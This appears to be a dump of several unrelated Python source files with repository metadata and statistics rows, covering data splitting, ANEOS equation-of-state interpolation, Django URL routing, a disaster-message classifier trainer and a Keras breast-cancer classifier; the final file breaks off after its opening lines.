4e1ec745ae938f742c6afb0e88b08ea50c6028cb
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
import re
# from pyltp import Segmentor
import jieba.posseg as pseg
import jieba
import os
import sys
import json
import math
# import kenlm
import nltk
from collections import Counter
def dataSplit(inputpath, count):
(filepath, tempfilename) = os.path.split(inputpath)
(filename, extension) = os.path.splitext(tempfilename)
outputlist = []
for i in range(count):
outputpath = os.path.join('./word/', filename + "_" + str(i) + extension)
print(outputpath)
outputlist.append(outputpath)
outputfiles = []
for path in outputlist:
output = open(path, encoding='utf-8', mode='w+')
outputfiles.append(output)
print('open input')
fin = open(inputpath, encoding='utf-8')
print('read input')
lines = fin.readlines() # 调用文件的 readline()方法
print('calculate lines')
total = len(lines)
sclice = math.floor(total / count)
i = 0
while i < count - 1:
print("write file " + str(i))
outputfiles[i].writelines(lines[i * sclice:(i + 1) * sclice])
outputfiles[i].close()
print("write file " + str(i) + " is ok~~ ")
i += 1
print("write file " + str(i))
outputfiles[i].writelines(lines[i * sclice:])
outputfiles[i].close()
print("write file " + str(i) + " is ok~~ ")
print("all is ok~~")
# dataSplit('TNewsSegafter2.txt', 32)
dataSplit('TNewsSegafter1.txt', 32)
| 28
| 81
| 0.621148
| 178
| 1,428
| 4.977528
| 0.421348
| 0.022573
| 0.063205
| 0.076749
| 0.214447
| 0.214447
| 0.214447
| 0.214447
| 0.214447
| 0.214447
| 0
| 0.01184
| 0.231092
| 1,428
| 50
| 82
| 28.56
| 0.795082
| 0.081933
| 0
| 0.146341
| 0
| 0
| 0.111877
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.02439
| false
| 0
| 0.219512
| 0
| 0.243902
| 0.219512
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5f3df5f78e78d0ee2fc42ec4cf3a85208b508f67
| 7,178
|
py
|
Python
|
eos/old_scott_ANEOS_conversion.py
|
ScottHull/FDPS_SPH
|
6db11d599d433f889da100e78c17d6f65365ceda
|
[
"MIT"
] | null | null | null |
eos/old_scott_ANEOS_conversion.py
|
ScottHull/FDPS_SPH
|
6db11d599d433f889da100e78c17d6f65365ceda
|
[
"MIT"
] | null | null | null |
eos/old_scott_ANEOS_conversion.py
|
ScottHull/FDPS_SPH
|
6db11d599d433f889da100e78c17d6f65365ceda
|
[
"MIT"
] | null | null | null |
"""
This is a python script that converts u(rho, T), P(rho, T), Cs(rho,T), S(rho, T)
to T(rho, u), P(rho, u), Cs(rho, u), S(rho, u), which is more useful for SPH calculations
"""
import matplotlib.pyplot as plt
from collections import OrderedDict
import numpy as np
import pandas as pd
import csv
import sys
from scipy.interpolate import interp1d
from scipy import interpolate
def emptyLineIndices(f):
empty_lines = [0]
with open(f, 'r') as infile:
reader = csv.reader(infile)
next(reader) # drop header row
for index, row in enumerate(reader):
if len(row) == 0:
empty_lines.append(index)
infile.close()
return empty_lines
def chunkFile(f, emtpy_lines):
densities = []
d = {}
with open(f, 'r') as infile:
reader = csv.reader(infile)
headers = next(reader)
reader = list(reader)
for index, line in enumerate(empty_lines):
temp_dict = {}
for i in headers:
temp_dict.update({i: []})
if (index + 1) != len(empty_lines):
min, max = empty_lines[index] + 1, empty_lines[index + 1] - 1
trimmed_reader = reader[min:max]
for row in trimmed_reader:
for index2, i in enumerate(row):
header = headers[index2]
temp_dict[header].append(reformat(i))
density = reformat(temp_dict['Pressure (Pa)'][0])
densities.append(density)
d.update({density: temp_dict})
return d
def reformat(number):
if isinstance(number, str):
if '-101' in str(number):
new_num = float(number.split('-')[0]) * (10**(-101))
return new_num
else:
return float(number)
else:
return number
def recalculateEnergies(d, grid_number, min_energy, delta):
"""
For each density sample, we want the same exponential energy grid
:param d:
:param grid_number:
:param min_energy:
:param delta:
:return:
"""
densities = d.keys()
new_energies = []
for i in range(0, grid_number):
new_energy = min_energy * (delta**i)
new_energies.append(new_energy)
for i in densities:
d[i].update({'Energy (J/kg)': new_energies})
return d
nu = 120 # number of the grid for the internal energy (exponential)
infile_path = 'granite.table.csv'
empty_lines = emptyLineIndices(f=infile_path)
sorted_dict = chunkFile(f=infile_path, emtpy_lines=empty_lines)
densities = sorted_dict.keys()
infile_df = pd.read_csv(infile_path)
energy = [reformat(i) for i in list(infile_df['Energy (J/kg)'])]
min_energy = min(energy)
max_energy = max(energy)
delta = (min_energy / max_energy)**(1/(nu-1))
sorted_dict = recalculateEnergies(d=sorted_dict, grid_number=nu, min_energy=min_energy, delta=delta)
for i in densities:
energies = sorted_dict[i]['Energy (J/kg)']
temperatures = sorted_dict[i]['Temperature (K)']
pressures = sorted_dict[i]['Pressure (Pa)']
sound_speeds = sorted_dict[i]['Sound speed (m/s)']
entropies = sorted_dict[i]['Entropy (J/kg/K)']
f_temperature = interpolate.interp1d(energies, temperatures, kind='linear', fill_value='extrapolate')
sorted_dict[i].update({'Temperature (K)': f_temperature(energies)})
f_pressure = interpolate.interp1d(temperatures, pressures, kind='linear', fill_value='extrapolate')
sorted_dict[i].update({'Pressure (Pa)': f_pressure(sorted_dict[i]['Temperature (K)'])})
f_soundspeed = interpolate.interp1d(temperatures, sound_speeds, kind='linear', fill_value='extrapolate')
sorted_dict[i].update({'Sound speed (m/s)': f_soundspeed(sorted_dict[i]['Temperature (K)'])})
f_entropy = interpolate.interp1d(temperatures, entropies, kind='linear', fill_value='extrapolate')
sorted_dict[i].update({'Entropy (J/kg/K)': f_entropy(sorted_dict[i]['Temperature (K)'])})
# infile_df = pd.read_csv(infile_path)
#
# density = sorted(list(set([reformat(i) for i in list(infile_df['Density (kg/m3)'])]))) # remove duplicates, then sort
# temperature = sorted(list(set([reformat(i) for i in list(infile_df['Temperature (K)'])])))
# energy = [reformat(i) for i in list(infile_df['Energy (J/kg)'])]
# pressure = [reformat(i) for i in list(infile_df['Pressure (Pa)'])]
# sound_speed = [reformat(i) for i in list(infile_df['Sound speed (m/s)'])]
# entropy = [reformat(i) for i in list(infile_df['Entropy (J/kg/K)'])]
#
# min_energy = min(energy)
# max_energy = max(energy)
# delta = (min_energy / max_energy)**(1 / (nu - 1))
#
# new_energy = [min_energy * (delta**i) for i in range(0, nu)]
#
# new_temperature = []
# new_pressure = []
# new_sound_speed = []
# new_entropy = []
#
# for m in range(0, nu):
#
# # internal energy
# f_temperature = interpolate.interp1d(energy[m:], temperature[m:], kind='linear', fill_value='extrapolate')
# new_temperature.append(f_temperature(new_energy))
#
# # pressure
# f_pressure = interpolate.interp1d(temperature[m:], pressure[m:], kind='linear', fill_value='extrapolate')
# new_pressure.append(f_pressure(new_temperature[m]))
#
# # sound speed
# f_soundspeed = interpolate.interp1d(temperature[m:], sound_speed[m:], kind='linear', fill_value='extrapolate')
# new_sound_speed.append(f_soundspeed(new_temperature[m]))
#
# # entropy
# f_entropy = interpolate.interp1d(temperature[m:], entropy[m:], kind='linear', fill_value='extrapolate')
# new_entropy.append(f_entropy(new_temperature[m]))
#
# new_temperature = np.array(new_temperature)
# new_pressure = np.array(new_pressure)
# new_sound_speed = np.array(new_sound_speed)
# new_entropy = np.array(new_entropy)
#
# for m in range(0, len(density), int(len(density)/6)):
#
# ax = [0, 0, 0, 0]
#
# fig = plt.figure(figsize = (10,6.128))
#
# ax[0] = fig.add_subplot(221)
# ax[1] = fig.add_subplot(222)
# ax[2] = fig.add_subplot(223)
# ax[3] = fig.add_subplot(224)
#
# ax[0].semilogy(np.array(temperature) * 1e-3, np.array(energy[m:]) * 1e-6, '--', label="original ANEOS")
# ax[0].semilogy(new_temperature[m:] * 1e-3, np.array(new_energy[m:]) * 1e-6, '-.', label="modified")
# ax[1].semilogy(np.array(temperature) * 1e-3, np.array(pressure[m:]) * 1e-6,'--', new_temperature[m:] * 1e-3, new_pressure[m:] * 1e-6,'-.')
# ax[2].plot(np.array(temperature) * 1e-3, np.array(sound_speed[m:]) * 1e-3,'--', new_temperature[m:] * 1e-3, new_sound_speed[m:] * 1e-3,'-.')
# ax[3].plot(np.array(temperature) * 1e-3, np.array(entropy[m:]) * 1e-3,'--', new_temperature[m:] * 1e-3, new_entropy[m:] * 1e-3,'-.')
#
# ax[0].legend(frameon=False)
#
# ax[0].set_ylabel('Energy (MJ/kg)', fontsize=10)
# ax[1].set_ylabel('Pressure (MPa)', fontsize=10)
# ax[2].set_ylabel('Sound Speed (km/s)', fontsize=10)
# ax[3].set_ylabel('Entropy (kJ/K/kg)', fontsize=10)
# ax[2].set_xlabel('Temperature ($10^3$ K)', fontsize=10)
# ax[3].set_xlabel('Temperature ($10^3$ K)',fontsize=10)
#
# fig.suptitle("Density: %3.3f kg/m$^3$" %(density[m]))
# # plt.show()
# # fig.savefig("Density" + str(m) + ".png")
| 34.344498
| 146
| 0.636389
| 1,013
| 7,178
| 4.363277
| 0.174729
| 0.036199
| 0.01629
| 0.01267
| 0.345475
| 0.280995
| 0.254525
| 0.201584
| 0.137104
| 0.083258
| 0
| 0.022692
| 0.195737
| 7,178
| 208
| 147
| 34.509615
| 0.742941
| 0.478406
| 0
| 0.120482
| 0
| 0
| 0.085888
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.048193
| false
| 0
| 0.096386
| 0
| 0.216867
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5f3f44af77a5d9949e7fe7c6858624af3b7fa923
| 346
|
py
|
Python
|
scheduler/post_scheduler/urls.py
|
Awinja-j/Social-Media-post-Scheduler
|
4f95b4bb2ca3f890d3e22bcda859b94ebc483b87
|
[
"MIT"
] | 1
|
2021-05-08T08:21:06.000Z
|
2021-05-08T08:21:06.000Z
|
scheduler/post_scheduler/urls.py
|
Awinja-j/Social-Media-post-Scheduler
|
4f95b4bb2ca3f890d3e22bcda859b94ebc483b87
|
[
"MIT"
] | null | null | null |
scheduler/post_scheduler/urls.py
|
Awinja-j/Social-Media-post-Scheduler
|
4f95b4bb2ca3f890d3e22bcda859b94ebc483b87
|
[
"MIT"
] | null | null | null |
from django.urls import path
from . import views
urlpatterns = [
path('post_posts', views.post_posts),
path('fetch_posts', views.get_posts),
path('fetch_post/<pk>', views.get_post),
path('delete_post/<pk>', views.delete_post),
path('edit_post/<pk>', views.edit_post),
path('search_for_a_post', views.search_for_a_post)
]
| 28.833333
| 54
| 0.699422
| 52
| 346
| 4.346154
| 0.326923
| 0.079646
| 0.146018
| 0.123894
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.141619
| 346
| 12
| 55
| 28.833333
| 0.760943
| 0
| 0
| 0
| 0
| 0
| 0.239193
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.2
| 0
| 0.2
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5f43a06d91c00b879b94bd9ca11de4d7d8fcab07
| 377
|
py
|
Python
|
full-stack/backend/django-app/django-jwt-app/settings/urls.py
|
mp5maker/library
|
b4d2eea70ae0da9d917285569031edfb4d8ab9fc
|
[
"MIT"
] | null | null | null |
full-stack/backend/django-app/django-jwt-app/settings/urls.py
|
mp5maker/library
|
b4d2eea70ae0da9d917285569031edfb4d8ab9fc
|
[
"MIT"
] | 23
|
2020-08-15T15:18:32.000Z
|
2022-02-26T13:49:05.000Z
|
full-stack/backend/django-app/django-jwt-app/settings/urls.py
|
mp5maker/library
|
b4d2eea70ae0da9d917285569031edfb4d8ab9fc
|
[
"MIT"
] | null | null | null |
from django.contrib import admin
from django.urls import path, include
from rest_framework_jwt.views import (
obtain_jwt_token,
refresh_jwt_token,
)
urlpatterns = [
path('admin/', admin.site.urls),
path('token-auth/', obtain_jwt_token),
path('token-refresh/', refresh_jwt_token),
path('employee/', include('employee.urls', namespace='employee'))
]
| 22.176471
| 70
| 0.710875
| 48
| 377
| 5.375
| 0.416667
| 0.124031
| 0.108527
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.153846
| 377
| 16
| 71
| 23.5625
| 0.808777
| 0
| 0
| 0
| 0
| 0
| 0.161804
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.25
| 0
| 0.25
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5f45037068a6ca19658fc2ba430b609e4386fc29
| 15,989
|
py
|
Python
|
models/train_classifier.py
|
tarcisobraz/disaster-message-clf
|
22de03350a0f993005564a1d07a43da6bd989e67
|
[
"DOC"
] | null | null | null |
models/train_classifier.py
|
tarcisobraz/disaster-message-clf
|
22de03350a0f993005564a1d07a43da6bd989e67
|
[
"DOC"
] | null | null | null |
models/train_classifier.py
|
tarcisobraz/disaster-message-clf
|
22de03350a0f993005564a1d07a43da6bd989e67
|
[
"DOC"
] | null | null | null |
#General libs
import sys
import os
import json
from datetime import datetime
import time
#Data wrangling libs
import pandas as pd
import numpy as np
#DB related libs
from sqlalchemy import create_engine
#ML models related libs
from sklearn.pipeline import Pipeline, FeatureUnion
from sklearn.metrics import confusion_matrix
from sklearn.model_selection import train_test_split
from sklearn.multioutput import MultiOutputClassifier
from sklearn.ensemble import RandomForestClassifier
from sklearn.neighbors import KNeighborsClassifier
from sklearn.naive_bayes import GaussianNB
from sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer
from sklearn.metrics import classification_report
from sklearn.model_selection import GridSearchCV
from sklearn.linear_model import LogisticRegression
#Gensim
from gensim.models import KeyedVectors
#Custom Transformers and Estimators
import nlp_estimators
#Model Saver
import dill
#Workspace Utils
from workspace_utils import active_session
#Glove Models dictionary (to be filled in when needed)
glove_models_by_size = {50: None,
100: None,
300: None}
#Train Configurations to be filled in when script is called
train_configs = {}
def get_or_load_glove_model(num_dims):
'''
INPUT
num_dims - int, number of dimensions of the Glove model to be loaded
OUTPUT
glove_model - object, the pre-trained glove model with the specified number of dimensions
This function either retrieves the already-stored glove model or loads and
stores it from file using the train configuration `glove_models_folderpath`
'''
if glove_models_by_size[num_dims] == None:
print('Pre-trained Glove Model with {} dims not found. '\
'\nLoading it from file...'.format(num_dims))
glove_models_by_size[num_dims] = KeyedVectors.load_word2vec_format(
os.path.join(train_configs['glove_models_folderpath'],
'glove.6B.{}d_word2vec.txt'.format(num_dims)),
binary=False)
return glove_models_by_size[num_dims]
def load_data(database_filepath):
'''
INPUT
database_filepath - string, filepath of database from which data will be loaded
OUTPUT
X - numpy array, The raw messages ready to be used to train the pipelines
X_tokenized - numpy array, The tokenized messages ready to be used to train the pipelines
Y - numpy array, The list of categories to which each message belongs
category_columns - pandas series, The names of the categories
categories_tokens - numpy array, The tokenized categories names (to be used by cats_sim feature set)
This function loads and prepares data for the models training
'''
engine = create_engine('sqlite:///' + database_filepath)
messages_df = pd.read_sql_table(con=engine, table_name='Message')
categories_df = pd.read_sql_table(con=engine, table_name='CorpusWide')
messages_tokens = pd.read_sql_table(con=engine, table_name='MessageTokens')
X = messages_df.message.values
X_tokenized = messages_tokens.tokens_str.values
Y_df = categories_df.drop(['message_id', 'message', 'original', 'genre'], axis=1)
Y = Y_df.values
category_columns = Y_df.columns
categories_tokens = np.array([np.array(cat.split('_')) for cat in category_columns])
return X, X_tokenized, Y, category_columns, categories_tokens
def build_estimator_obj(estimator_code):
'''
INPUT
estimator_code - string, the code of the classifier object to be built
OUTPUT
classifier_obj - sklearn estimator, the built classifier object
This function builds a classifier object based on the estimator code received as input.
For unexpected codes, it prints an error and exits the script execution
'''
classifier_obj = None
if estimator_code == 'rf':
classifier_obj = RandomForestClassifier()
elif estimator_code == 'lr':
classifier_obj = LogisticRegression()
else:
print("Invalid Classifier Estimator Code " + estimator_code)
exit(1)
return classifier_obj
def build_classifiers_build_params(classifiers_configs):
'''
INPUT
classifiers_configs - dict, a dictionary containing the configuration for each classifier
OUTPUT
classifiers_params_dict - dict, a dictionary containing the grid params to be used for
each classifier in the training process
This function builds a dictionary with grid params to be used in training process for each
classifier whose configurations were given as input.
It can handle a single classifier or a list of classifiers.
'''
if len(classifiers_configs) > 1:
classifiers_params_list = []
classifiers_params_dict = {}
for classifier in classifiers_configs:
classifier_estimator = classifier['estimator']
classifier_obj = build_estimator_obj(classifier_estimator)
classifier_obj = MultiOutputClassifier(classifier_obj.set_params(**classifier['params']))
classifiers_params_list.append(classifier_obj)
classifiers_params_dict['clf'] = classifiers_params_list
elif len(classifiers_configs) == 1:
classifier = classifiers_configs[0]
classifier_estimator = classifier['estimator']
classifier_obj = build_estimator_obj(classifier_estimator)
classifier_obj = MultiOutputClassifier(classifier_obj)
classifiers_params_dict = {'clf' : [classifier_obj]}
classifiers_params_dict.update(classifier['params'])
print(classifiers_params_dict)
return classifiers_params_dict
def build_model(model_config,classifiers_params,categories_tokens):
'''
INPUT
model_config - dict, a dictionary containing the configuration for a model pipeline
classifiers_configs - dict, a dictionary containing the configuration for each classifier
categories_tokens - numpy array, array containing the tokenized categories names
OUTPUT
grid_search_cv - sklearn GridSearchCV, a grid search CV object containing specifications
on how to train the model based on the input configs
This function builds a Grid Search CV object with specifications for training process for a
given model and its classifiers whose configurations were given as input.
It can handle different feature_sets:
- Local Word2Vec
- Pre-Trained Glove
- Doc2Vec
- Category Similarity
- All Features Sets together
'''
feature_set = model_config['feature_set']
print("Building Model for feature set: {}".format(feature_set))
print("Grid Params: {}".format(model_config['grid_params']))
pipeline = grid_search_params = grid_search_cv = None
jobs = -1
score = 'f1_micro'
def_cv = 3
verbosity_level=10
if feature_set == 'local_w2v':
pipeline = Pipeline([
('local_w2v', nlp_estimators.TfidfEmbeddingTrainVectorizer()),
('clf', MultiOutputClassifier(GaussianNB()))
])
grid_search_params = model_config['grid_params']
elif feature_set == 'glove':
pipeline = Pipeline([
('glove', nlp_estimators.TfidfEmbeddingTrainVectorizer(
get_or_load_glove_model(50))),
('clf', MultiOutputClassifier(GaussianNB()))
])
grid_search_params = {'glove__word2vec_model' :
[get_or_load_glove_model(num_dims) for num_dims in
model_config['grid_params']['glove__num_dims']]}
elif feature_set == 'doc2vec':
pipeline = Pipeline([
('doc2vec', nlp_estimators.Doc2VecTransformer()),
('clf', MultiOutputClassifier(GaussianNB()))
])
grid_search_params = model_config['grid_params']
elif feature_set == 'cats_sim':
pipeline = Pipeline([
('cats_sim', nlp_estimators.CategoriesSimilarity(
categories_tokens=categories_tokens)),
('clf', MultiOutputClassifier(GaussianNB()))
])
grid_search_params = {'cats_sim__word2vec_model' :
[get_or_load_glove_model(num_dims) for num_dims in
model_config['grid_params']['cats_sim__num_dims']]}
elif feature_set == 'all_feats':
pipeline = Pipeline([
('features', FeatureUnion([
('local_w2v', nlp_estimators.TfidfEmbeddingTrainVectorizer(num_dims=50)),
('glove', nlp_estimators.TfidfEmbeddingTrainVectorizer(
get_or_load_glove_model(50)
)),
('doc2vec', nlp_estimators.Doc2VecTransformer(vector_size=50)),
('cats_sim', nlp_estimators.CategoriesSimilarity(categories_tokens=categories_tokens,
word2vec_model=get_or_load_glove_model(50)))
])),
('clf', MultiOutputClassifier(GaussianNB()))
])
grid_search_params = model_config['grid_params']
else:
print("Error: Invalid Feature Set: " + feature_set)
sys.exit(1)
# Adds classifiers params to grid params
grid_search_params.update(classifiers_params)
grid_search_cv = GridSearchCV(estimator=pipeline,
param_grid=grid_search_params,
scoring=score,
cv=def_cv,
n_jobs=jobs,
verbose=verbosity_level)
return grid_search_cv
def evaluate_model(model, X_test, Y_test, category_names):
'''
INPUT
model - sklearn GridSearchCV, the GridSearch containing the model with best performance on the training set
X_test - numpy array, tokenized messages ready to be used to test the fit pipelines
Y_test - numpy array, array containing the tokenized categories names for the test set
category_names - pandas series, the categories names
OUTPUT
test_score - float, the score of the input model on the test data
This function runs the model with best performance on the training set on the test dataset,
printing the precision, recall and f-1 per category and returning the overall prediction score.
'''
print('Best params: %s' % model.best_params_)
# Best training data accuracy
print('Best training score: %.3f' % model.best_score_)
# Predict on test data with best params
Y_pred = model.predict(X_test)
test_score = model.score(X_test, Y_test)
# Test data accuracy of model with best params
print('Test set score for best params: %.3f ' % test_score)
for category_idx in range(len(category_names)):
print(classification_report(y_pred=Y_pred[:,category_idx],
y_true=Y_test[:,category_idx],
labels=[0,1],
target_names=[category_names[category_idx] + '-0',
category_names[category_idx] + '-1']))
return test_score
def save_model(model, model_filepath):
'''
INPUT
model - sklearn Estimator, the model with best performance on the training set
model_filepath - string, path where model picke will be saved
This function saves the model with best performance on the training set to a given filepath.
'''
# Output a pickle file for the model
with open(model_filepath,'wb') as f:
dill.dump(model, f)
def build_grid_search_results_df(gs_results, gs_name, test_score):
'''
INPUT
gs_results - dict, dictionary containing the results of GridSearchCV training
gs_name - string, the name of the GridSearchCV feature set
test_score - float, the score of the best performing model of the GridSearchCV on the test set
OUTPUT
gs_results_df - pandas DataFrame, a dataframe holding information of the GridSearchCV results
(train and test) for record
This function builds a dataframe with information of the GridSearchCV results
(train and test) for record.
'''
gs_results_df = pd.DataFrame(gs_results)
gs_results_df['grid_id'] = gs_name
gs_results_df['best_model_test_score'] = test_score
gs_results_df['param_set_order'] = np.arange(len(gs_results_df))
return gs_results_df
def run_grid_search():
'''
This function runs the whole model selection phase:
- Load Data from DB
- Build Model
- Run GridSearch
- Save results to file
- Save best model pickle file
'''
start = time.time()
print("Train configuration:")
print(json.dumps(train_configs, indent=4))
print('Loading data...\n DATABASE: {}'.format(train_configs['database_filepath']))
X, X_tokenized, Y, category_names, categories_tokens = load_data(train_configs['database_filepath'])
X_train, X_test, Y_train, Y_test = train_test_split(X_tokenized, Y, test_size=0.25)
classifiers_params = build_classifiers_build_params(train_configs['classifiers'])
print('Running GridSearch on models parameters...')
best_score = 0.0
best_gs = ''
overall_results_df = pd.DataFrame()
for model_config in train_configs['models']:
print('Building model...')
model = build_model(model_config,
classifiers_params,
categories_tokens)
print('Training model...')
model.fit(X_train, Y_train)
print('Evaluating model...')
test_score = evaluate_model(model, X_test, Y_test, category_names)
gs_results_df = build_grid_search_results_df(model.cv_results_,
model_config['feature_set'],
test_score)
overall_results_df = pd.concat([overall_results_df, gs_results_df])
print('Saving model...\n MODEL: {}'.format(
model_config['model_ouput_filepath']))
save_model(model.best_estimator_, model_config['model_ouput_filepath'])
print('Trained model saved!')
# Track best (highest test accuracy) model
if test_score > best_score:
best_score = test_score
best_gs = model_config['feature_set']
output_filepath = train_configs['results_folderpath'] + \
'res-' + train_configs['name'] + '-' + \
datetime.now().strftime('%Y-%m-%d_%H:%M:%S') + \
'.csv'
print('Saving Results...\n FILEPATH: {}'.format(output_filepath))
overall_results_df.to_csv(output_filepath, index=False)
print('\nClassifier with best test set accuracy: %s' % best_gs)
end = time.time()
print("Training Time: " + str(int(end - start)) + "s")
def main():
if len(sys.argv) >= 3:
train_config_filepath, using_udacity_workspace = sys.argv[1:]
# Read train config from file
with open(train_config_filepath, 'r') as f:
global train_configs
train_configs = json.load(f)
if using_udacity_workspace == 1:
with active_session():
run_grid_search()
else:
run_grid_search()
else:
print('Please provide the filepath of train configuration file and '\
' whether or not you are using udacity workspace (0,1) \n\n'\
'Example running local: python train_classifier.py configs/train_config_simple.json 0'\
'\nExample running at Udacity: python train_classifier.py configs/train_config_simple.json 1')
if __name__ == '__main__':
main()
| 37.888626
| 117
| 0.659704
| 1,896
| 15,989
| 5.327532
| 0.179852
| 0.01881
| 0.009801
| 0.008316
| 0.306108
| 0.244431
| 0.226314
| 0.208692
| 0.184536
| 0.111276
| 0
| 0.005528
| 0.264557
| 15,989
| 421
| 118
| 37.978622
| 0.853474
| 0.272625
| 0
| 0.144144
| 0
| 0
| 0.135254
| 0.015976
| 0
| 0
| 0
| 0
| 0
| 1
| 0.045045
| false
| 0
| 0.103604
| 0
| 0.18018
| 0.103604
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5f501af017d1618fd9d8ac7f58bef0af07c22038
| 2,757
|
py
|
Python
|
MLP/Detectar cancer de mama/Cancer_mama_simples.py
|
alex7alves/Deep-Learning
|
7843629d5367f3ea8b15915a7ba3667cf7a65587
|
[
"Apache-2.0"
] | null | null | null |
MLP/Detectar cancer de mama/Cancer_mama_simples.py
|
alex7alves/Deep-Learning
|
7843629d5367f3ea8b15915a7ba3667cf7a65587
|
[
"Apache-2.0"
] | null | null | null |
MLP/Detectar cancer de mama/Cancer_mama_simples.py
|
alex7alves/Deep-Learning
|
7843629d5367f3ea8b15915a7ba3667cf7a65587
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Wed Oct 17 21:04:48 2018
@author: Alex Alves
Programa para determinar se um tumor de mama
é benigno (saida 0) ou maligno (saida 1)
"""
import pandas as pa
# Importação para poder dividir os dados entre treinamento da rede e testes de validação
from sklearn.model_selection import train_test_split
import keras
from keras.models import Sequential
from keras.layers import Dense
from sklearn.metrics import confusion_matrix, accuracy_score
entrada = pa.read_csv('entradas-breast.csv')
esperado = pa.read_csv('saidas-breast.csv')
# Treinamento com 75% e validação com 25%
entrada_treinar, entrada_teste, esperado_treinar,esperado_teste =train_test_split(entrada,esperado,test_size=0.25)
# Criando a rede neural
detectar_cancer = Sequential()
#Adicionando camada de entrada
detectar_cancer.add(Dense(units=16,activation='relu',kernel_initializer='random_uniform',input_dim=30))
#Adicionando uma camada oculta
detectar_cancer.add(Dense(units=16,activation='relu',kernel_initializer='random_uniform'))
# Adicionando camada de saida
detectar_cancer.add(Dense(units=1,activation='sigmoid'))
# Compilar a rede
#compile(descida_gradiente,função do erro- MSE, precisão da rede)
# clipvalue -> delimita os valores dos pesos entre 0.5 e -0.5
# lr = tamanho do passo, decay-> redução do passo
otimizar = keras.optimizers.Adam(lr=0.001,decay=0.0001)
# Nesse caso o clipvalue prejudicou
#otimizar = keras.optimizers.Adam(lr=0.004,decay=0.0001,clipvalue=0.5)
detectar_cancer.compile(otimizar,loss='binary_crossentropy',metrics=['binary_accuracy'])
#detectar_cancer.compile(optimizer='adam',loss='binary_crossentropy',metrics=['binary_accuracy'])
# Fazer o treinamento da rede - erro calculado para 10 amostras
#depois atualiza os pesos -descida do gradiente estocasticos de 10 em 10 amostras
detectar_cancer.fit(entrada_treinar,esperado_treinar,batch_size=10,epochs=100)
# Pegando os pesos
pesosCamadaEntrada = detectar_cancer.layers[0].get_weights()
pesosCamadaOculta = detectar_cancer.layers[1].get_weights()
pesosCamadaSaida = detectar_cancer.layers[2].get_weights()
# Realizando teste de validação
# retorna probabilidade de acerto
validar = detectar_cancer.predict(entrada_teste)
# convertendo para true ou false (1 ou 0) para comparar
# se for maior que 0.5 é true, caso contrário é false
validar = (validar > 0.5)
# compara os 2 vetores e calcula a porcentagem de acerto
# da rede usando o conjunto de treinamento
precisao = accuracy_score(esperado_teste,validar)
# Matriz de acertos da rede
acertos = confusion_matrix(esperado_teste,validar)
# Outra maneira de resultado
# retorna o erro e a precisão
resultado = detectar_cancer.evaluate(entrada_teste, esperado_teste)
| 33.216867
| 114
| 0.791077
| 406
| 2,757
| 5.251232
| 0.448276
| 0.078799
| 0.023921
| 0.030957
| 0.149625
| 0.136961
| 0.06848
| 0.06848
| 0.06848
| 0.06848
| 0
| 0.030826
| 0.117519
| 2,757
| 82
| 115
| 33.621951
| 0.845458
| 0.478781
| 0
| 0
| 0
| 0
| 0.080657
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.25
| 0
| 0.25
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5f587bf36e711ee18aa81e26269a6338ac9328eb
| 1,388
|
py
|
Python
|
Stephanie/updater.py
|
JeremyARussell/stephanie-va
|
acc894fa69b4e5559308067d525f71f951ecc258
|
[
"MIT"
] | 866
|
2017-06-10T19:25:28.000Z
|
2022-01-06T18:29:36.000Z
|
Stephanie/updater.py
|
JeremyARussell/stephanie-va
|
acc894fa69b4e5559308067d525f71f951ecc258
|
[
"MIT"
] | 54
|
2017-06-11T06:41:19.000Z
|
2022-01-10T23:06:03.000Z
|
Stephanie/updater.py
|
JeremyARussell/stephanie-va
|
acc894fa69b4e5559308067d525f71f951ecc258
|
[
"MIT"
] | 167
|
2017-06-10T19:32:54.000Z
|
2022-01-03T07:01:39.000Z
|
import requests
from Stephanie.configurer import config
class Updater:
